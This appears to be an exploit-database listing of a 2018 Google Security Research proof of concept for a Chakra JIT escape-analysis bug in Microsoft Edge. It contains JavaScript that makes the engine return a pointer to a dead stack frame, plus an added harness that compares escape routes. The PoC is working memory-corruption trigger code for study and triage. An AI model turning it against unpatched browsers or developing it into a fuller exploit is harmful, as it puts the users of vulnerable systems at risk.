Microsoft Edge Chakra JIT - Escape Analysis Bug Exploit

09 Jan 2018, reported by Google Security Research (source: 0day.today, type: zdt)

/*
Escape analysis: https://en.wikipedia.org/wiki/Escape_analysis

Chakra's JIT fails to detect that "tmp" escapes the scope of opt() (it is
returned through its own element tmp[0]) and allocates it on the stack.
The caller then receives a pointer into the dead stack frame of opt(), so
dereferencing the result reads uninitialized stack values.

PoC:
*/
 
function opt() {
    let tmp = [];
    tmp[0] = tmp;     // the only reference to tmp is stored inside tmp itself
    return tmp[0];    // returns tmp, but the JIT does not treat this as an escape
}

function main() {
    // Warm up so opt() gets JIT-compiled with the stack allocation applied.
    for (let i = 0; i < 0x1000; i++) {
        opt();
    }

    print(opt());  // deref uninitialized stack pointers!
}

main();

#  0day.today [2018-03-01]  #
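The following harness is an added example and is not part of the original PoC or of ChakraCore. It generalizes the pattern above: each variant lets the same self-referential array escape the callee by a different route (through its own element, by direct return, through a closure, through a container property), warms the variant up with the same 0x1000 iterations the PoC uses (an assumed-sufficient JIT threshold), and then checks that the escaped object is still the live, self-referential array. The variant names, the `checkVariant`/`runAll` helpers and the `print`/`console.log` shim are assumptions for this example; on a patched engine or on Node every check returns true, while on the vulnerable ChakraCore the self-element variant yields a dangling stack pointer and the check crashes or fails.

```javascript
// Added example (not from the original page): triage harness for escape-analysis bugs.
// Each variant builds an array that refers to itself and lets it escape the
// callee by a different route. After JIT warm-up the result must still be the
// same live object; a crash or a failed check points at a stack allocation of
// an object that actually escaped.

const ITER = 0x1000; // warm-up count taken from the PoC (assumption: enough to reach the JIT)

// Route 1 (the PoC's pattern): the object escapes only through an element that
// refers to the object itself.
function escapeViaSelfElement() {
    let tmp = [];
    tmp[0] = tmp;
    return tmp[0];
}

// Route 2: the object is returned directly (the obvious escape).
function escapeViaReturn() {
    let tmp = [];
    tmp[0] = tmp;
    return tmp;
}

// Route 3: the object escapes through a closure that outlives the frame.
function escapeViaClosure() {
    let tmp = [];
    tmp[0] = tmp;
    return () => tmp[0];
}

// Route 4: the object escapes through a property of another object.
function escapeViaContainer() {
    let tmp = [];
    tmp[0] = tmp;
    return { inner: tmp }.inner;
}

// A correctly escaped array is a one-element array whose element is itself.
function isSelfReferential(arr) {
    return Array.isArray(arr) && arr.length === 1 && arr[0] === arr;
}

// Warm a variant up so it is JIT-compiled, then verify the escaped object is intact.
function checkVariant(fn) {
    for (let i = 0; i < ITER; i++) fn();
    let result = fn();
    if (typeof result === "function") result = result(); // closure route
    return isSelfReferential(result);
}

// Run every variant and return a name -> boolean report.
function runAll() {
    const variants = { escapeViaSelfElement, escapeViaReturn, escapeViaClosure, escapeViaContainer };
    const report = {};
    for (const name of Object.keys(variants)) {
        report[name] = checkVariant(variants[name]);
    }
    return report;
}

// ch.exe (ChakraCore shell) exposes print(); Node uses console.log.
const out = typeof print === "function" ? print : console.log;
out(JSON.stringify(runAll()));
```

Run it under ch.exe against a vulnerable build and again under a patched build or Node: only the `escapeViaSelfElement` entry should differ, which isolates the self-element return as the route the escape analysis misses.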

Risk: 7.8 (High); Vulners AI Score 7.8; EPSS 0.935